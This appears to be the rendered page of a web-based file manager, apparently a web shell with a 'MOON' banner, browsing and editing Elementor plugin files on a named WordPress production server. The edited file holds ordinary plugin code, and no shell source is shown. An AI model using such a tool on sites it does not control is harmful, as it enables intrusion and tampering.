┌────────────────────────────────┐ │ ░░░ ░░▓ ░▓▓ ███ ▓▓░ ▓░░ │ │ ~ M O O N ~ │ └────────────────────────────────┘
prd-web-01.centraldc.gr
LOCATION:
/var/www/html/gshub/wp-content/plugins/elementor/modules/element-manager
☗ ROOT
↻ REFRESH
✎ EDIT FILE
EDITING: options.php
<?php namespace Elementor\Modules\ElementManager; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } class Options { public static function get_disabled_elements() { return (array) get_option( 'elementor_disabled_elements', [] ); } public static function update_disabled_elements( $elements ) { update_option( 'elementor_disabled_elements', (array) $elements ); } public static function is_element_disabled( $element_name ) { return in_array( $element_name, self::get_disabled_elements() ); } }
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📁 admin-menu-items/
DIR
—
2026-05-05 06:08
📄 admin-menu-app.php
PHP
884 B
2026-05-05 06:08
EDIT
📄 ajax.php
PHP
5.7 KB
2026-05-05 06:08
EDIT
📄 module.php
PHP
3 KB
2026-05-05 06:08
EDIT
📄 options.php
PHP
532 B
2026-05-05 06:08
EDIT